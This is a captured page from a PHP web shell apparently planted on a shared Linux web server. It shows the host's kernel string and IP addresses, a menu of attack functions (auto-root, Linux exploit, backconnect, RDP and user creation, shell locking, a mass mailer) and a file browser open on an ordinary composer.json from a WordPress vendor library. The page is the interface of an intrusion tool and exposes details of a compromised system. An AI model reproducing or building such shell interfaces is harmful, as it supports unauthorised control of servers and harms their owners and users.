Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
mck89 /
peast /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
LICENSE
1.46
KB
-rw-r--r--
README.md
1.99
KB
-rw-r--r--
composer.json
737
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "mck89/peast", "description": "Peast is PHP library that generates AST for JavaScript code", "license": "BSD-3-Clause", "authors": [ { "name": "Marco Marchiò", "email": "marco.mm89@gmail.com" } ], "require": { "php": ">=5.4.0", "ext-mbstring": "*" }, "require-dev": { "phpunit/phpunit": "^4.0 || ^5.0 || ^6.0 || ^7.0 || ^8.0 || ^9.0" }, "autoload": { "psr-4": { "Peast\\": "lib/Peast/" } }, "autoload-dev": { "psr-4": { "Peast\\test\\": "test/Peast/" } }, "extra": { "branch-alias": { "dev-master": "1.17.2-dev" } } }
Close